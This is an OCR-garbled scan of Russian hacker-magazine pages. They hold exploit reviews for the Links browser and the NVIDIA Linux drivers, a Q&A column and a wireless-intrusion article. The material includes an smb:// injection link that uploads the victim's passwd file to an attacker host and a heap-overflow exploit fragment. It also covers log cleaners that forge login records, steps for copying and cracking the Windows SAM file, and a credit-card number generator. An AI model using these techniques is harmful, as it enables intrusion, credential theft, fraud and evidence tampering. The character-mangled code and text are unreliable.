простоты и отсутствия поддержки скриптов 
с прочими тяжеловесными элементами, 
долгое время (на парус другим консольным 
браузером — Бупх) он по праву считался 
самым безопасным «судном» для ѵѵеЬ-сер- 
финга. Я активно пользовался им сам и даже 
рекомендовал его другим. Но вот на стыке 
2006 и 2007 годовусилиями хакера Теети 
Заітеіа в нем обнаружиласьогромная дыра, 
позволяющая атакующему исполнять любые 
5МВ-команды на машинежертвы, просмат- 
ривающей зараженную НТМЕ-страничку 
с помощью Ыпкз'а (естественно, 5МВ-клиент 
должен быть установлен). Ошибка гнездит- 
ся в функции зтЬ_іипс(), расположенной 
в файле зтЬ.с. 

Тагде^з 

Уязвимость подтверждена в версиях Ыпкз 
1 .ООргеІ 2 и ЕЫпкз 0.11.1, но и остальные 
версии также уязвимы. 

Ехріоі* 

Линк, эксплуатирующий уязвимость: 

зшЬ: / /аДДаскег . пеД/ѵтогк/ХХХ" УУУ; 
Іей . . ; Іей . . ; Іссі . . ; Іей еДс; риД 
раззѵ^О ; ехіР; 

Зоіи^іоп 

Самое простое, что можно сделать, — отка- 
заться от Ыпкз'а в пользу Бупх или же нало- 
житьзаплатку, благо составители популяр- 
ных дистрибутивов оперативно посуетились. 
Однако существует множество неофици- 
альных билдов Біпкз'а (и его собратьев), 
пользователям которых можно посоветовать 
закомментировать 1 62-ую строку и переком- 
пилировать код. Естественно, выполнение 
каких бы то ни было 5 МВ- ко манд браузером 
после этого станет невозможным, нуда 
невелика потеря. 
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□ Переполнение 

буфера в драйверах ІМѴШІА для ЫІМІІХ 
ВгіеТ 

Раз уж этот обзор ехріоі'ов оказался стихийно 
посвящен І_іпих-программам (причем безо 
всякого умысла с моей стороны, просто так 
получилось), будетуместно рассказать о дыре 
в «фирменных» драйверах от ІЧѴЮІА, выпу- 
щенных в виде двоичных файлов без исходных 
текстов. Увы! Закрытые продукты встречаются 
и в І_іпих, причем качество большинства из 
них весьма невелико, а доработка «напиль- 
ником» чрезвычайно затруднена — оной по- 
нятно: в машинном коде разбирается далеко 
не каждый линуксоид. А вот ѴѴІпбоѵѵБ-хакеры 
чувствуют себя как рыба в (мутной) воде — им 
к этому не привыкать. 

Дыра выражается в виде традиционной 
ошибки переполнения и при благоприятном 
(для хакера) стечении обстоятельств позволя- 
ет атакующему выполнять произвольный код 
на целевой системе с наивысшими уровнем 
привилегий, причем атака может быть осу- 
ществлена не только локально, но и удаленно 
— через гетоіе X- клиента или X- клиента, 



зашедшего на ѵѵеЬ-сервер с «троянской» стра- 
ничкой. Технические подробности можно найти 
на ѵѵѵѵѵѵ.5есигіМоси5.сот/ЬісІ/20559/іп1о . 

КІѴЮІА официально подтверждает уяз- 
вимость двух следующих версий І_іпих- 
драй веров: 1 .0-8762 и 1 .0-8774, утверждая, 
что более ранние версии (такие, например, 
как 1 .0-81 78 или 1 .0-7184) не содержат 
этой дыры, а начиная с версии 1.0 -8776, 
она уже исправлена: ЬирУ/пѵісІіа.сизіЬеІр. 
сот/сді-Ьіп/пѵісІіа.сІд/рІір/епсІизег/зІсІ абр. 
рЬр?р 1адісІ=1 971 . Но различные незави- 
симые эксперты подозревают, что и более 
древние вере ии уязвимы тоже (в первую 
очередь подозрение падает на версии 
драйверов подЗоІагізи РгееВЗй), однако 
никто из них это не подтвердил ргооі-оі- 
сопсері ехріоіі'ом, поэтому вопрос остается 
открытым. Тем временем компания Зоіагів 
клятвенно заверяет, что на платформу 5 РАРС 
эта угроза не распространяется, но х86- 
64- вере и и драйверов все-таки уязвимы: 
ЬирѴ/зипзоІѵе.зип.сопп/зеагсН/сІосигіпепІ:. 
бо?аззе1:кеу=1 -26-102693-1 &зеагсИс[аизе= . 



Ехріоі* 

Исходный текст демонстрационного ехріоіі'а 
с збеіі-кодом на бортулежит по адресу 
Ыір://боѵѵп[оасІ2.гаріб7.сот/г7-0025/пѵ ехріоіі.с . 
а ниже приведен его ключевой фрагмент: 

Ключевой фрагмент ехріоіі'а, атакую- 
щего уязвимые драйверы от ІМѴШІА 

ХСІурІіІпТо * діурііз; 
ХВетЗегРісДРогтаД ТтР; 
ХКепсЗегРісДРогтаЦ *тазк = 0; 
СІурІіЗеР дзеД; сЬаг * ЬиТ =0; іпР 
оТТзеР, сг, питВ; іпР хзегеепроз = 
32680; 

іпР тадіс_1еп= 2768-хзсгеепроз; 
іпР ѵ\/г_аскіг_1еп = 3 548; іпР ѵ\/г_пор_ 
1еп=2 0 0 ; 

оТТзеР = дорасісіг- (Ііеарасісіг- 
0х2С0000 ) ; 

оТТзеР += тадіс_1еп; діурііз = таііо 
с ( зігеоТ (ХСІурІіІпТо) *3 ) ; 

/* РауІоасЗ діуріі */ 
діурііз [0] .ѵ\/ісі1:1і= 0x4000 ; // опе 
сопРідиоиз ЬиТ о! 16К. . . ѵ\/ау тоге 
Оііап песеззагу 

д1ур1зз[0] . ІіеідІіЦ = 1; діурііз [0] . 
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> Отсюда ІЧѴЮІА раздает свои драйверы для 1_іпих-систем 
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> МѴЮІА подтверждает наличие дыры и обещает в будущих 
версиях драйверов все исправить 



уОіі = 0; д1уркз[0] . хОіі = 
д1ур!із[0] . ѵ\7-ісЗ.-Ып ; 

д1ур!із[0] .х = 0; д1ур!із[0] .у = 0; 
хдІурЬійз [ 0 ] = 'А'; хдІурЬісІз [ 1 ] = 

' В ' ; хдІурЬісіз [ 2 ] = ' С ' ; 

іпк зкгісіе = ( (дІурЬз [0] . 

юі(іиі*1)+3)&~3; /* Ыеесіз Во Ье 

ШОКБ аіідпесі */ 

іпк Ъиізіге = зВгі<іе*д1урЬз [ 0 ] . 

Ьеідііѣ; Ъиі = таііос (Ъиізіге) ; 

/* Ѵ/гіВе Оке ШР іпзкгискіопз ипкіі 
ѵ\пг_пор_1еп */ 

тетзек (Ъи:Е+отг_ас1с1г_1еп* 0x90 / 

*/, Шг_пор_1еп) ; 

/* Саісиіаке Оке питЬег оі В'з 
гедиігесі Во зепсі */ 
питВ = оіізек / (д1уркз[1] .уОіі * 
тадіс_1еп) ; 

/* Меж сгеаВе а пеѵѵ ЬиВВег Вог Оке 
зВгіпд сіаВа */ 

зВгіпд = таііос (питВ+1/*питС*/+1/ 
*питА*/+І/*ШЪЬ*/) ; 

Вог (сг=0; сг<питВ; сг++) 
зВгіпд [сг ] = ' В ' ; зВгіпд [сг] 

= ' С ' ; сг++ ; зВгіпд [сг] = 'А' ; 
сг++ ; зВгіпд [сг ] =0 ; 
тазк = ХКепсЗегЕіпсІЕогтак (сіізріау , 
РісВРогтаВТуре I РісВРогшаВБерВЬ , 
&ВтВ , 0 ) ; 

дзеВ = ХКепсіегСгеаВеСіурЬЗеВ (сіізрі 
ау, тазк) ; 

/ * ЕЖ) НЕАР ОѴЕКЕЬСЖ ЗЕТІІР СОБЕ * / 

Зоіи-Моп 

Для предотвращения внедрения достаточно от- 
ключить акселератор рендеринга через опцию 
РепсІегАссеІ в конфигурации Х-сервера или же 



скачать (и установить) обновленные версии 
драйверов: 

• Ьир://боѵѵп[оаб.пѵібіа.сот/ХРгее86/ипих- 
х86 64/1 .0-8776/МѴІРІА-Цпих-х86 64-1.0- 
8776-ркд2.гип [для Ы п их 8762) ; 

• ЬВВрУ/сІ оѵѵпІоасІ.пѵісІіа.сопп/ХРгее86/Ыпих- 
х86 64/1.0-8776/МѴІРІА-ипих-х86 64-1.0- 
8776-ркд2.гип (для Ыпих8774); 

• ѵѵѵѵѵѵ.пѵібіа.сот/оЬ]есі/[іпих сіівріаѵ атб64 
1 .0-8776-Ыт І (инструкции по установки драй- 
веров под Ьі п их) ; 

• ѵѵѵѵѵѵ.5ип.сот/бе5кЩр/ѵѵогк5Іа1іоп/иига20/ 
боѵѵпіоабз^зр (для Зоіагіз 1)11 га 20, II и га 20 М 2) ; 

• ѵѵѵѵѵѵ.вип.сот/сіезкіор/ѵѵогкзіаііоп/и ІВга40/ 
сіоѵѵпіоасіздзр (для Зоіагіз ІЛВга 40). 

Гиіі гіізсіозе 

История эта началась в далеком 2004 году 
(по понятиям компьютерной безопасности, это 
практически целая вечность), перед самым 
Новым годом, когда на форумах возник всплеск 
сообщений о странном поведении Ыпих-сис- 
тем и внезапном крахе самых разнообразных 
иксовых приложений: РігеРох, КОЕ и т.д. 

В частности, попытка выполнить следующий 
ниже код под Есіірзе приводила к ошибке типа 
«Бедтепіабоп Раиіі» [ ЬирзУ/Ьидз.есІірзе. 
огд/Ьидз/зЬоѵѵ Ьид.сді?іб=87299 ): 



Вог ( іпВ у = 0; у < 20000; у++) 

Вог (ІпВ х = 0; х < 10; х++ ) 
ЗузВет. оиВ . ргіпВ (х) ; 

Дальше — больше. Форумы оказались бук- 
вально затоплены сообщениями об ошибках, 
но виновника найти не удавалось. Подозрение 



пало на Х-сервер. В нем действительно обнару- 
жилось несколько критичных ошибок, но после 
их исправления дело лучше не стало. Ситуация 
оставалась мрачной и напряженной. 

РгіШ был первым, кому в июле 2006 года удалось 
воспроизвести ошибку, о чем он и отрапор- 
товал на форуме ѵѵѵѵѵѵ. пѵп еѵуз.пеі/ѵЬиЦеііп/ 
5ЬоѵѵіЬгеасІ.рЬр?р=931048 . Как оказалось, чтобы 
вызвать крах системы следовало выполнить 
следующие «ритуальные» действия: 

1. сходить по ссылке ѵѵѵѵѵѵ. [ Іо гі а пзргод га типе. 
бе.ѵиЛтр/сгазЬѲТКОІ .М [безобидная програм- 
ма на Питоне, вычисляющая число «пи» с охра- 
нительным количеством знаков послезапятой 

и дописывающая эталонный результат к концу 
листинга, то есть очень-очень длинную строку); 

2. копипастом перенести текст в дгарЬесік; 

3. выделить весьтекст, включая эту самую 
длинную строку; 

4. нажать клавишу«Васкзрасе»; 

5. оп-с, мы имеем крах, то есть это нас имеют, да 
еще как! 

Ксообщению был приложен «ІМѴЮІА Ьид герогі 
Іод бІе»со всей информацией о памяти, регист- 
рах и т.д. ( ѵѵѵѵѵѵ. пѵпеѵѵз.пеі/ѵЬииеІіп/аиасЬтепк 
рЬр?акасЬтепбсІ=1 91 92&сІ=1 152258443 ). благо- 
даря чему копании ІМѴЮІАуже через несколько 
часов удалось воспроизвести и подтвердить 
ошибку, которую она пообещала исправить 
в следующем релизе драйверов версии 1 ,0-9ххх. 
При этом всплыли некоторыетехнические подроб- 
ности инцидента, скупо описанные компанией на 
фирменном сайте ЬкрУ/пѵібіа.сизіЬеІр.сот/сді-Ьіп/ 
пѵісІіа.сбд/рЬ р/епсіизег/зісі асІр.рЬ р?р [адісІ=197. 
Обновленные драйверы, действительно, вышли, 
но история на этом не закончилась, и дыры 
в них какбыли.таки остались, о чем в октябре 



ШР 



КОД, ВЫЗЫВАЮЩИЙ ПАДЕНИЕ ЕСЫР5Е 
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> ІЧѴЮІА признает, что кругом была неправа 



2006 года и сообщила компания Ра рісі 7, 1_І_С 
Зесигііу Асіѵізогу [ ѵѵѵѵѵѵ.гарісІ7.сот ). специали- 
зирующаяся, как и следует из ее названия, на 
информационной безопасности. 

В пресс-релизе, датированном 1 6 октября 2006 
года [ Нир://бо\л/пІоаб2.гаріб7.сот/г7-0025 ). она 
не только сообщила массутехнических подроб- 
ностей, но и привела исходный код ргоо^-о^- 
сопсері ехрІоіРа, демонстрирующий механизм 
локального и удаленного заброса зЬеІІ-кода на 
атакуемый компьютер. 

Компания ІМѴЮІА признала себя виновной 
по всем статьям, выпустив спустя 4 дня ответ- 
ный пресс-релиз, который одни хакеры сочли 
неубедительным оправданием, другие — недо- 
статочно искренним раскаянием: ЬирУ/пѵісІіа. 
сизіЬеІр.сот/сді-Ьіп/пѵібіа.сІд/рІпр/епбизег/ 
зіб ас!р.рЬр?р бадіс!=1 971 . 

Главноето, что нам, наконец, стало известно, 
почему возникаетпереполнение. Если верить 
ЫѴЮІА (а не веритьей у нас никаких поводов 
вроде бы нет), дела обстоят приблизительнотак: 

1. из системной памяти выделяется временный 
буфер (зсгаісб Ьиббег) фиксированного размера 
(сІатресНоа тахітитзі^еідляотрисовки глифов 



— текстовых символов и прочих шрифтов (дІурЬ 
гепбегіпд); 

2. список глифов, поступающих на отрисовку, 
не сравнивается с размером выделенного 
буфера; 

3. если список глифов превышает за ранее 
заданный максимальный размер временного 
буфера, наступаетего переполнение и... все! 

На самом деле, никакое это не все, а только 
начало детективного расследования. В дейс- 
твительности, существует 2 семейства ЫѴЮІА- 
драйверов для І_іпих — с открытым и закрытым 
кодом. Закрытые драйверы отличаются тем, что 
поддерживают различные режимы акселерации 
(которые в отрытой версии напрочь отсутс- 
твуют), в том числе и рендеринг шрифтов (ну, 

в смысле, глифов), реализованный в расши- 
рении ХРепбег, экспортирующем функцию 
ХРепбегСотрозИ:е5і;гіпд8, которая в тесной 
координации с Х-сервером выводит шрифты на 
экран. 

Именно поэтомудефектреализацииХРепбег'а 
долгое время считали ошибкой Х-сервера (как 
говорится, искали в черной комнате черную 
кошку, которой там нет). 
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Итак, получив список глифов, которые 
требуется отрендерить, функция 
ХРепбегСотрозі1:е5і:гіпд8 через специаль- 
ный саІІЬаск обращается к драйверу, и, если 
этот лист превышает размер выделенного 
буфера, наступает закономерный крах. 

Более детальные исследования показы- 
вают, что закрытый драйвер регистрирует 
функцию _пѵ000373Х, поручая ей расчет 
границ ВохРес-области, необходимой для 
вмещения всех данных, выводимых на 
экран. Выделение памяти осуществляет- 
ся посредством функции Ха Нос , а размер 
буфера определяется путем умножения 
ширины области рендеринга на ее высо- 
ту. Полученный буфер передается другой 
внутренней функции _пѵ000053Х, которая 
последовательно проходит по всем глифам, 
копируя каждый в буфер, отталкиваясь от его 
положения на плоскости (хОіф уОбб) , а также 
от ширины (ѵѵісНЬ) и высоты ІЬеідЫ), пос- 
редством которых, она вычисляет следую- 
щую позицию в буфере. Однако проверка на 
выход за границы буфера, по обыкновению, 
не выполняется и происходит переполне- 
ние. Причем не простое, а очень даже спе- 
цифичное. Манипулируя значениями хОбб, 
уОбб, ѵѵісібИ и ЬеідЫ, на которые атакующий 
может воздействовать явным образом, он 
получает возможность записи произвольных 
данных/кода по произвольному адресу. 

Соль в том, чтоХ-сервер получаетсписок 
глифов отХ-клиента, который может быть как 
локальным, таки удаленным. Идея удаленныхХ- 
клиентов возникла в те далекие времена, когда 
цветной монитор был огромной роскошью и да- 
же зажиточные организации с трудом позволя- 
ли себе его иметь в количестве «одна штука», 
а рабочих станций, как правило, было намного 
больше одной. Вот и пришлось разрабатывать 
механизмы удаленного вывода графической 
информации натерминал. Сейчасже это ру- 
димент, практически никем не используемый, 
но по целому ряду причин сохранившийся даже 
в современных версиях никсов. 

В роли удаленного Х-клиента может выступать 
практически любая иксовая программа, взаимо- 
действующая с сетью, например РігеРох, которо- 
му скормили слишком дли иную те кетовую строку 
(вроде той, что была на страничке с числом «пи»). 
Причем совершенно не обязательно пропи- 
сывать эту строку в НТМБ'е «прямым текстом». 
СойдетЗаѵа или любой другой скриптовый язык. 
Такчто угроза не мифический призрак, а вполне 
реальный и оченьзлобный монстр, поражаю- 
щий всехтех, кто не отключил акселерацию или 
не обновился. НС 



ХАКЕР 02 /98/ 07 





ПКХзА 



ОФИЦИАЛЬНЫЙ СПОНСОР ИГР 



НІІ 

ОР 

10 / 03/07 
МОСКВА 
ЗИМНИЕ 

МЕЖДУНАРОДНЫЕ 

ИГРЫ 

ЭКСТРЕМАЛЬНЫХ 
ВИДОВ СПОРТА 

№ѴѴиЛА0ЯЕ№иМСАМЕ5.Пи 



1 ■ :*г^=Гі^:і*Ттгг*і 








взлом 




ИВАН СКЛЯРОВ 




^0: ЧТО ТАКОЕ МІМ-АТАКА? 

А: Аббревиатура МІМ, или МІТМ, происходит отанглийского Мап- 
Іп-Ше-Міббіе, то есть «атака с человеком посередине». Суть 
МІМ-атаки в том, что междудвумя (или более) узлами, обменива- 
ющимися данными, вмешивается третья сторона, которая пере- 
хватывает, прослушивает или блокирует передачу информации. 
Существует множество разновидностей МІМ-атак под различ- 
ные среды передачи информации. 

^0: А МОЖНО КОНКРЕТНЫЙ ПРИМЕР МІМ-АТАКИ? 

во* А: Разумеется, можно, воттипичная МІМ-атака — АРР Ресіігесі (АРР- 
врообпд). Суть ее состоит в следующем. Допустим, хакеру нужно 
перехватитьтрафик между узлами А и В в коммутируемой (пос- 
троенной на свитчах) сети. Любой узел в сети Ебпегпеб посылая 
данные по какому-либо ІР-адресу, должен знатьтакже МАС-ад- 
рес своего собеседника. Поэтому каждая машина, перед тем как 
послатьданные, всегда сначала просматриваетсвой АРР-кэш, 
в котором хранятся соответствия «ІР-МАС», на наличие нужного 
МАС-адреса. Если такого соответствия не обнаруживается, узел 
посылает широковещательный АРР-запрос. Хакер может пос- 
лать фал ьсифицирова иное АР Р-сообщение узлу А, указав, что 
МАС-адрес машины хакера соответствует ІР-адресу узла В. 

Узел А за несет эти сведения в свой АРР-кэш и, когда будет 
посылать пакеты узлу В, в реальности отправит ихузлу хакера. 
Для полноценного двустороннего перехвата хакеру нужно про- 
делатьаналогичные действия с АРР-кэшем узла В. Послеэтого 
весьтрафик между узлами А и В будет идти через машину хакера. 
Хакеру необходимо периодически посылать фальсифицирован- 
ные АРР-сообщенияузлам Аи В для обновления их АРР-таблиц, 
иначе они рано или поздно сформируют правильную таблицу. 

^0: ХОЧУ НАУЧИТЬСЯ 

ПИСАТЬ ЭКСПЛОЙТЫ, ЧТО ДЛЯ ЭТОГО НУЖНО? 

Во* А: Во-первых, для этого нужна голова, а в ней — мозги. Во-вторых, 

необходимо выучить языки программирования Си и Ассемблер, 
разобраться с устройством операционных систем. Затем можно 
приступать к чтению специализированных статей и книг кон- 
кретно по программированию эксплойтов. Правда, на русском 



языке хороших мануалов по этому вопросу почти нет. Из книг 
могу посоветовать только свою собственную — «Программиро- 
вание боевого софта под Ыпих» (Иван Скляров). В ней наибо- 
лее полная и детальная информация по программированию 
локальныхи удаленных эксплойтов под ошибки переполнения 
буфера в стеке и куче, Ьвв, форматной строки, но только под 
операционную систему Еіпих. Под ѴѴІпсІоѵѵз надо смотреть другие 
источники, либо ждать, пока я напишу «Программирование 
боевого софта под ѴѴІпсіоѵѵб». 

^0: В ЧЕМ СУТЬ РТР ВОІШСЕ АТАКИ? 

Во* А: ЕТР Воипсе Айаск (скрытая атака по ЕТР) — это применение 

ЕТР-сервера в качестве ргоху для проведения атак на другие 
узлы с целью сокрытия своего местоположения. Основана эта 
возможность на использовании одной особенности ЕТР-серве- 
ров: после подключения к ЕТР-серверу клиент должен передать 
ему команду РОРТ с параметрами, указывающими, с каким ІР- 
адресом надо соединиться и какой порт открыть по этому адресу 
— обычно этот порт и адрес соответствуют самой машине клиен- 
та. Однако вместо своего ІР-адреса и порта на своей машине ха- 
кер может передать ІР-адрес и ТСР-порт машины-жертвы. Таким 
образом, например, можно выполнять анонимное сканирование 
портов машины-жертвы. Выполняя команду ЫЗТ, ЕТР-сервер 
попытается прочитать на ней текущий каталог, посылая на ука- 
занный в команде РОРТ порт назначения ТС Р5УІМ -запрос. Если 
порт на машине-жертве открыт, то на сервер приходит ответТСР 
5УЫ АСКи ЕТР-клиентполучает«150» и «226», если же порт за- 
крыт, то — «425. СапЧ Виіісі йа1а Соппесііоп: Соппесбоп Ре^ивесІ» 
(«425. Невозможноустановитьсоединение: в соединении 
отказано»). Далее в цикле ЕТР-серверу можно последовательно 
выдавать команды РОРТ и 6І5Т и осуществлять сканирование 
разных портов. Подобным образом обходятся файрволы. К сожа- 
лению, в наше время не все ЕТР-серверы позволяют использо- 
вать этот метод. 

^0:ЧТО ОЗНАЧАЕТ ТЕРМИН «КСОРИТЬ»? 

^ А: Ксорить — это выполнять логическую операциюХОР (исключаю- 
щее ИЛИ), которая имеет следующую семантику: 



-/ 066 -, 
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Охог 1 = 1 
1 хогО= 1 
Охог 0 = 0 
1 хог 1 = 0 

Обычно эту операцию используют для простейшего шифрования. Я тебе 
советую заглянуть в мою книгу «Головоломки для хакера», там 
ты сможешь порешать кучу головоломок на дешифрование 
текстов с использованием ХОР. 

^0: ПОСОВЕТУЙ ЛОГКЛИНЕР ПОД ЫМЫХ, КОТОРЫЙ НЕ ПРОСТО 

УДАЛЯЕТ ЗАПИСИ ИЗ ІІТМР/ѴѴТМР/І.А5ТІ.06р А СПОСОБЕН ПОДМЕ- 
НЯТЬ ЗАПИСИ НА ПОДДЕЛЬНЫЕ. 

Во* А: Пожалуйста: логклинер Мг-І_упсІ0ѵ1_2.с способен подменять поль- 
зователей и хосты в логфайлах; тте.с позволяет подставлять 
записи с другого логина вместо реальных; пабі.с может подме- 
нять любыеуказанные данные в записях на новые. Ищи все эти 
и другие логклинеры на ЬирУ/раскеівіогтвесигііу.огд . 

Ю О: КАК СКОПИРОВАТЬ 5АМ-ФАЙЛ? 

Во А: Напомню, что в файле 5АМ (Зесигііу Ассоипі: М а падег — дис- 
петчер защиты учетных записей) хранятся учетные записи 
пользователей, содержащие в том числе имя пользователя 
и его пароль в ѴѴІпбоѵѵв N Т/2000/ХР/2003 . Этот файл распо- 
ложен в каталоге %$уз1:етРоо1:%\5у5І:ет32\сопбд І но к нему 
нельзя получить доступ, пока ѴѴІпбоѵѵз [\ІТ/2000/ХР/2003 
загружена, так как он постоянно открыт операционной сис- 
темой для того, чтобы изменения становились доступны без 
перезагрузки компьютера. Поэтому можно поступить одним 
из следующих способов: 

1. Если на компьютереустановлена еще одна операционная система 

(например, І_іпих), то загрузиться с нее, выйти в нужный раздел 
и скопировать 5АМ-файл в другой каталог или на дискету/Сй 
(кроме 5АМ, обычно нужно еще переписать файл 5Ѵ5ТЕМ из того 
же каталога). 

2. Использовать с той же целью Ыѵе-СО (например, Кпорріх). 

3. Если ѴѴІпсіоѵѵб ЫТ/2000/ХР/2003 была установлена на файловую систе- 

му ЕАТ (ЕАТ32),то просто создать загрузочную дискету, загру- 
зиться с нее и скопировать файл 5АМ в другой каталог или на 
дискету. Если ѴѴІпсіоѵѵб установлена на файловую систему ЫТЕ5, 
то для доступа к файлу 5АМ использовать дискету, созданную 
в программе ЫТЕЗйоБ Рго. 

4. Иногда копия файла 5АМ хранится в каталоге %5уБ{етРооІ%\гераіг р 

из которого ее можно скопировать без перезагрузки. 

Только зачем тебе копировать файл 5АМ? Если для того чтобы получить 
из негологины и пароли, то лучшесразу использовать одну 
из следующих программ: ЮрЫсгаскД, ЮР ( ѵѵѵѵѵѵ.іср.сіа.ги ). 
АбѵапсесІ ЫТ Ехріогег ( ѵѵѵѵѵѵ.еІсотБо^.сот ) или ЗАМІпзісІе 
( ѵѵѵѵѵѵ.іпБІсІерго.сопп ). Они позволяют расшифровать пароли 
без предварительного копирования файла 5АМ, в том числе на 
удаленном компьютере. 

^0: ЧТО ТАКОЕ АІІТО КО ОТЕК? 

Во* А: Аиіогооіег (отанглийского аиіо — автоматический и гооі — права 
системного администратора в II N IX- подобных системах) 

— это комплекс из одного или множества эксплойтов и других 
боевыхутилит, таких каксканер портов или сканер безопасности. 



Авторутеры могут быть выполнены в виде одного файла или 
множества связанных файлов. Они специально создаются ха- 
керами для облегчения взлома серверов. Авторутер самостоя- 
тельно ищет в сети уязвимые машины, осуществляет их взлом 
и затем оповещаетоб этом своего хозяина. Осуществляя 
массовый автоматический взлом в сети, авторутер имеет еще 
одно название — тазБгооіег (отанглийского плэбб — массо- 
вый). Массрутеры действуют во многом аналогично интернет- 
червям, но только находятся при этом под полным контролем 
хакера. Публичных массрутеров пока известно не очень много, 
но, очевидно, число их будет расти. Из тех, что доступны 
в публичных интернет-архивах, можно назвать тазБгоІегбпаІ 
от ОасісІу_сасІ, Ірб аиіогооіег от баѵе, ОрепБЭб-іш от Нагсіеп 
и другие. Всех их можно найти на бНрУ/раскеіБіогтзесигііу.огд . 

^ ( V ПОДСКАЖИ КАКОЙ-НИБУДЬ РАБОТАЮЩИЙ ГЕНЕРАТОР НО- 

МЕРОВ КРЕДИТНЫХ КАРТ? 

Во* А: Вот, пожалуйста: ТНС-Сгебіі ѵі .91 от известной немецкой команды 
ТНС, он генерируетабсолютно правильные номера кредитных 
карт (Ѵіза, Атегісап ехргезБ и пр.). 

Одна только проблемка — вряд литы в настоящее время сможешь 

воспользоваться этими номерами, так как почти везде, кроме но- 
меров, требуется указать дату окончания срока действия карты, 
имя владельца кредитной карты, напечатанной на самой карте, 
СѴС/СѴѴ2-код и т.д. 

Хотя, надо заметить, на сайте ѵѵѵѵѵѵ.ІІпс.о га в ТорЗ Ооѵѵпіоасіесі 
Реіеазез по количеству окачиваний генератор ТНС-СгесІКѵІ .91 
до сих пор стоит на первом месте. И это несмотря на то, что 
программа была написана в 1999 году! 

Оі в ЧЕМ СУТЬ ОШИБКИ ІЫТЕСЕК ОѴЕКРІ.ОѴѴ И СУЩЕСТВУЮТ Л И 

ПОД ЭТУ ОШИБКУ ЭКСПЛОЙТЫ? 

^ А: Суть ошибки I поедет ОѵегІІоѵѵ заключается в том, что в 32-битных 

системахзначения переменныхтипа Іпіеде г могут лежать только 
в пределах от -2 147483648 до 2147483647 (4 байта) или от 0 до 
4294967295 для беззнаковых целых (ІІпзідпесІ Іпіедег). Еслиже 
в переменную записать значение, превышающее максимально 
возможное число, поведение программы будет непредсказуемо 
и зависит от компилятора. Следующий пример в системе біпих 
после компиляции и исполнения выдаетО, хотя, по логике, 
должен выдавать 4294967296: 

#іпс1ис!е <зОс1іо.]т> 
іпС таіп ( ) { 

пС вит = 42 949 672 95 + 1; 
ргіпДС ( " зит = %сЗ\п" , зит) ; 

} 

В стандарте 150 С99 для устранения этой уязвимости рекомендовалось 
просто использовать в вычислениях ІІпзідпесІ Іпіедег, однако на 
практике это нисколько не решает проблемы. Для устранения 
ошибки ІпіедегОѵегЕоѵѵ необходимо добавить в код проверки 
на превышениезначений переменных Іпіедег максимального 
предела. 

Эксплойты под эту ошибку, разумеется, существуют, достаточно набрать 
в ѵѵѵѵѵѵ.доодіе.ги «іпіедегоѵегЮѵѵехрІ-оН:» и всеувидетьсвоими 
глазами.іяі 



/Ті /Ті /*ТЧ /Ті /Ті /Ті /Ті /*ТЧ /Ті 



г/ 067 , 



ХАКЕР 02 /98/ О' 





^ взлом 



НЕСТАНДАРТНЫЕ МЕТОДЫ ВТОРЖЕНИЯ В БЕСПРОВОДНЫЕ СЕТИ 



В прошлых номерах мы рассматривали атаки на точки аутентификации в беспровод- 
ных сетях. Весь процесс заключался в компрометации стандартных способов автори- 
зации с помощью ѴѴЕР/ѴѴРА/ѴѴРА2/ЬЕАР-ключей. Это демонстрировалось на самых 
разных объектах, начиная пользовательскими домашними хотспотами и заканчивая 
оборудованием, расположенным на территории Красной площади :). Сейчас я расска- 
жу тебе о нестандартных методах вторжения практически в любую беспроводную сеть 



□ Прямая компрометация 

Атаками с прямой компрометацией являются 
инциденты, где атакующий получает интерак- 
тивный или привилегированный доступ. Прямая 
компрометация позволяет контролировать 
захваченное оборудование и просматривать 
хранящиеся на компьютере данные. Сказать 
честно, украсть данные из беспроводной точки 



доступа и маршрутизатора достаточнотрудно, так 
каких не такужи много :]. Ты врядли обнару- 
жишь на машинах платежные БД или какие-либо 
секретные штучки Пентагона. Самое большое, на 
что можно рассчитывать, — это информация о се- 
тевойтопологии, паролях и данныхо маршрутах. 
Применив определенную смекалку, можно перей- 
ти и к отдельным клиентам, которые пользуются 



услугами захваченного оборудования. Для на- 
чала введутебя в курс дела. Из недавней статьи 
«Атака на Кремль» ты узнал, что, обратившись 
к определенному адресу сети, реально найти 
то самое оборудование, которое «питает» всех 
инетом, и даже попытаться его взломать. Дейс- 
твительно, это так, при конфигурации точки 
доступа, а иногда и роутера, существует опция 
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> Аудитор безопасности ПО точки ѴѴі-Рі от К51ІРІ (СІІР.зи) 



> Вспомни, как все начиналось 



установки веб-интерфейса для визуализации 
процесса управления роутинга. Безусловно, тут 
есть определенные плюсы, но, какправило, лю- 
бые облегчения админской деятельности вызы- 
ваюттяжелые последствия. Используя 
подобную технологию, администратор 
в первую очередь должен скрыть 
ее, например, добавивзащиту по ІР, а не только 
авторизацию. Как ни странно, защита файер- 
волом выпадаету 70% админов из памяти, что 
и позволяетхакеру напасть на железки 
удаленно. Сперва веб-интерфейс надо задетек- 
тить — обратимся, какуже говорили, кххх.ххх.0.0 
или ххх. ххх. 0.1 , чащевсегоон виситименно 
там. Но кто сказал, что это всегда так? Имен- 
но для этого мы автоматизируем процесс 
поиска, используя следующий метод: 

ПОСЫЛАЯ ѲЕТ ЗАПРОС К ѴѴЕВ-ПОРТУ 
РОУТЕРА, В ОТВЕТ МОЖНО ПОЛУЧИТЬ ЭТО: 

СЕТ гедиезк "/" ко 192.168.0.1 
(192.168.0.1) 

НТТР/1 . 0 401 N0 

ШМ-АикЬепкісаке : Вазіс геа1т=" БІ- 
824ѴИР+" 

ЦааиЫіогігесі 
Токаі Ъукез геасі: 7 5 

Посоветовались с нашим Регі-кодером К51ІРІ 
и решили разработать утилиту, выполняющую 
аудит ПО точки на всевозможные атаки. 

регі кагс1ѵ\/аге_аис1іког .рі -з 

192.168.0. 0 -е 192.168.0.100 
ЬОАБШС МАС ... ок 
ЬОАБІЫС ВШЗ . . . ок 
ЬОАБІШ СКЕБІТЗ . . . ок 

192 . 168 .0. 12 - БЖі-2100ар сіекескесі 
(!) 



Одной из ошибокявляется применение службы 
5ЫМР (Зітріе Мек/ѵогк Мападетепі Ргоіосоі] 
с дефолтовым паролем «риЫіс». 

Наличие зпгпр позволило мне опознать 
«биографию» хотспота путем посылки специ- 
ального зптр-фрейма с ОЮ 1 .3.6.1 .2.1 .1 .1 . Ког- 
да эта служба включена, можно получить 
большой объем полезной сетевой информации. 
К примеру, атакующие из интернета могут даже 
узнатьхосты и диапазоны ІР-адресов внут- 
реннихсетей. По аптайму делаем вывод, что 
точка либо совсем девственная, либо 
периодически выключается/перезагружа- 
ется админом, поэтому нужно действовать 



